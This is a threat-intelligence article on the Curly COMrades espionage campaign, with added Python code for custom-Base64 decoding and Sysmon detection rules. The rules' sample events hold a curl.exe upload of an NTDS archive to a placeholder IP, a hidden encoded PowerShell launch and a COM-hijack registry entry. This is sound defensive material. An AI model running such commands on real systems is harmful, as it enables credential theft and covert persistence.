A newly uncovered cyber-espionage group, known as Curly COMrades, has been linked to a series of sophisticated attacks against high-value targets in Eastern Europe. The group has focused its operations on judicial and government bodies in Georgia, as well as an energy distribution company in Moldova. Security analysts believe the group’s tactics and target selection align with Russian geopolitical interests, though official attribution remains under investigation.
The name “Curly COMrades” was inspired by the group’s repeated use of the legitimate command-line utility curl.exe for data transfers, alongside its hijacking of Windows Component Object Model (COM) objects for persistence. Both choices reflect a deliberate strategy of blending malicious activity into trusted, already-present system functionality rather than dropping conspicuous new tooling, which makes detection considerably harder.
Innovative Backdoor and Persistence Tactics
Once inside a target network, Curly COMrades sets up multiple reverse-proxy tunnels using tools such as Resocks, custom SOCKS5 servers, SSH, and Stunnel. These tunnels let the attackers move laterally, execute commands, and exfiltrate data without raising immediate suspicion. The group repeatedly attempts to harvest credentials by targeting the Active Directory database (NTDS.dit) and by dumping the memory of the LSASS process.
A central element of their toolkit is a custom .NET backdoor dubbed MucorAgent. This multi-stage, stealthy implant executes AES-encrypted PowerShell scripts and returns the results to its operators over encrypted channels. Notably, MucorAgent persists by hijacking a COM object associated with a disabled scheduled task of the .NET Native Image Generator (NGEN): the hijacked CLSID is pointed at the attackers’ component, so whenever the task runs, the backdoor runs with it. Because Windows triggers NGEN on its own and at unpredictable times, such as during idle periods or after a .NET application update, the attackers gain stealthy, long-term access without a new task, service, or autorun entry of their own standing out.
Complementing this is CurlCat, a custom utility disguised as GoogleUpdate.exe so that it passes for Google’s legitimate updater. It is built on a modified libcurl and encodes its traffic with a custom Base64 alphabet, providing bidirectional communication between compromised hosts and attacker-controlled servers. Because the non-standard alphabet leaves the payload unreadable to an off-the-shelf Base64 decoder, and everything travels over ordinary HTTPS, CurlCat’s activity blends into normal web traffic.
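To show what a “custom Base64 alphabet” actually buys an attacker, and how an analyst undoes it once the alphabet has been recovered from the binary, here is an added example written for this article. It is not CurlCat’s code, and the alphabet it uses (the standard table rotated by 13 positions) is a hypothetical one chosen for illustration; the page does not give the real alphabet, which has to be extracted from the sample.

```python
"""Added example: Base64 over a non-standard alphabet, the trick that keeps
malware traffic unreadable to an off-the-shelf decoder. The custom alphabet
below is hypothetical; the real one must be pulled from the sample itself."""
import base64
import string

STD_ALPHABET = string.ascii_uppercase + string.ascii_lowercase + string.digits + "+/"
# Hypothetical custom alphabet: the standard table rotated by 13 positions.
CUSTOM_ALPHABET = STD_ALPHABET[13:] + STD_ALPHABET[:13]


def _check_alphabet(alphabet: str) -> None:
    if len(alphabet) != 64 or len(set(alphabet)) != 64:
        raise ValueError("a Base64 alphabet needs 64 distinct characters")


def encode_custom_b64(raw: bytes, alphabet: str = CUSTOM_ALPHABET, pad: str = "=") -> str:
    """Encode with the standard codec, then substitute symbol for symbol.
    This is all a custom alphabet is: the same 6-bit groups, different letters."""
    _check_alphabet(alphabet)
    table = str.maketrans(STD_ALPHABET + "=", alphabet + pad)
    return base64.b64encode(raw).decode("ascii").translate(table)


def decode_custom_b64(data: str, alphabet: str = CUSTOM_ALPHABET, pad: str = "=") -> bytes:
    """Map the custom symbols back onto the standard table, then decode strictly
    (validate=True rejects anything that is not valid Base64 after the mapping)."""
    _check_alphabet(alphabet)
    table = str.maketrans(alphabet + pad, STD_ALPHABET + "=")
    return base64.b64decode(data.translate(table), validate=True)


def fits_alphabet(data: str, alphabet: str = CUSTOM_ALPHABET, pad: str = "=") -> bool:
    """Triage check for a captured body: right length, at most two pad symbols,
    and every other character drawn from the candidate alphabet."""
    body = data.rstrip(pad)
    return (len(data) % 4 == 0
            and len(data) - len(body) <= 2
            and all(c in alphabet for c in body))


if __name__ == "__main__":
    plaintext = b"whoami /all\r\n"  # constructed sample of command output
    wire = encode_custom_b64(plaintext)
    print("on the wire:          ", wire)
    print("standard decoder sees:", base64.b64decode(wire))  # wrong bytes, by design
    print("custom decoder sees:  ", decode_custom_b64(wire))
```

Two points worth noting. First, a standard decoder does not fail on this traffic; it succeeds and returns the wrong bytes, so the absence of a decode error is not evidence that a capture is plain Base64. Second, when the custom alphabet is merely a permutation of the standard characters, as in this hypothetical one, `fits_alphabet` cannot tell the two apart by character set alone; it only becomes decisive when the attacker’s alphabet swaps in characters that standard Base64 never uses.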
Strategic Risks and Defensive Measures
The Curly COMrades campaign underscores a growing trend among advanced persistent threats: the weaponization of legitimate system components to remain hidden in sensitive environments. By embedding themselves within trusted processes and services, attackers can persist for months without detection, posing significant risks to national security and critical infrastructure.
Defenders are urged to adopt capable Endpoint Detection and Response (EDR) solutions, apply strict patch management, and leverage behavioral analytics to spot unusual system activity. Concretely, continuous monitoring for anomalous use of curl.exe (unexpected parent processes, upload options, unfamiliar destinations), for new per-user COM registrations under HKCU\Software\Classes\CLSID that shadow the machine-wide entries in HKLM, for child processes spawned by the NGEN task that are not its own compilation workers, and for access to LSASS memory or copies of NTDS.dit could provide early warning of such intrusions.
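To make those monitoring points concrete, and to cover the MucorAgent persistence mechanism described above, here is an added example written for this article; it is not code from the researchers who documented the group, nor from any vendor product. It runs three simple rules over constructed Sysmon-style events (EventID 1 is process creation, EventID 13 is a registry value being set, and Sysmon reports per-user registry keys under HKU\<SID>\). The sample events, file paths, the CLSID, and the allow-lists of expected curl.exe parents and expected NGEN child processes are all assumptions made for the illustration and would need tuning to a real environment.

```python
"""Added example: toy detection rules for the signals discussed above, run over
constructed Sysmon-style events (EventID 1 = process create, EventID 13 =
registry value set). Sample data, paths, CLSID and allow-lists are assumptions
made for this illustration, not indicators taken from any report."""
import re

# Per-user COM registration: HKU\<SID>\Software\Classes\CLSID\{GUID}\InprocServer32.
# A user-hive entry takes precedence over the HKLM one; that precedence is what COM hijacking abuses.
CLSID_INPROC_RE = re.compile(
    r"\\Software\\Classes\\CLSID\\\{[0-9A-Fa-f-]{36}\}\\InprocServer32", re.IGNORECASE)

# Processes belonging to the .NET Native Image Generator (NGEN) task.
NGEN_IMAGES = {"ngen.exe", "ngentask.exe", "mscorsvw.exe"}
# Assumption: the only children an NGEN process should spawn are its own workers.
NGEN_EXPECTED_CHILDREN = {"mscorsvw.exe", "ngen.exe", "conhost.exe"}

# curl.exe options that push local data to a remote host.
CURL_UPLOAD_FLAGS = {"-T", "--upload-file", "-d", "--data", "--data-binary", "-F", "--form"}
# Assumption: in this environment curl.exe is only launched interactively from these parents.
CURL_EXPECTED_PARENTS = {"cmd.exe", "powershell.exe", "pwsh.exe", "explorer.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('' for an empty path)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return (rule, subject, detail) tuples for every event that matches a rule."""
    alerts = []
    for ev in events:
        if ev["EventID"] == 1:
            image = basename(ev["Image"])
            parent = basename(ev.get("ParentImage", ""))
            tokens = ev.get("CommandLine", "").split()
            if image == "curl.exe":
                uploads = any(t in CURL_UPLOAD_FLAGS for t in tokens)
                if parent not in CURL_EXPECTED_PARENTS or uploads:
                    alerts.append(("curl_anomaly", ev["Image"], parent))
            # A hijacked CLSID loaded by the NGEN task shows up as NGEN spawning something it never should.
            if parent in NGEN_IMAGES and image not in NGEN_EXPECTED_CHILDREN:
                alerts.append(("ngen_unexpected_child", ev["Image"], parent))
        elif ev["EventID"] == 13:
            target = ev.get("TargetObject", "")
            if target.upper().startswith(("HKU\\", "HKCU\\")) and CLSID_INPROC_RE.search(target):
                alerts.append(("user_clsid_override", target, ev.get("Details", "")))
    return alerts


# Constructed sample telemetry (not real events); the CLSID and paths are placeholders.
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "curl.exe -s https://intranet.example/health"},            # benign
    {"EventID": 1, "Image": r"C:\Windows\System32\curl.exe",
     "ParentImage": r"C:\ProgramData\GoogleUpdate.exe",
     "CommandLine": r"curl.exe -T C:\Users\Public\ntds.zip https://203.0.113.10/up"},  # flagged
    {"EventID": 13, "TargetObject": r"HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\CLSID"
                                    r"\{00000000-0000-0000-0000-000000000001}\InprocServer32\(Default)",
     "Details": r"C:\Users\Public\Libraries\stage.dll"},                       # flagged
    {"EventID": 13, "TargetObject": r"HKLM\SOFTWARE\Classes\CLSID"
                                    r"\{00000000-0000-0000-0000-000000000002}\InprocServer32\(Default)",
     "Details": r"C:\Program Files\Vendor\vendor.dll"},                        # machine-wide install, not flagged
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc QQBBAEEA"},            # flagged
    {"EventID": 1, "Image": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe",
     "ParentImage": r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngentask.exe",
     "CommandLine": "mscorsvw.exe -StartupEvent 1 -InterruptEvent 2"},         # benign
]

if __name__ == "__main__":
    for rule, subject, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:22} {subject}  <- {detail}")
```

The HKLM registration is deliberately left unflagged: machine-wide CLSID entries are written by ordinary installers all the time, whereas a user-hive InprocServer32 value for a class that already exists under HKLM is the hallmark of a hijack. In a real deployment you would also join the `user_clsid_override` alert to the DLL path it points at and to the signing status of that file, and baseline curl.exe parents and NGEN children from your own telemetry rather than from the placeholder sets above.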
With geopolitical tensions showing no signs of easing, campaigns like this serve as a stark reminder that cyber-espionage is evolving toward more covert and resilient tactics. Understanding these techniques is critical for organizations seeking to protect themselves from long-term, undetected compromise.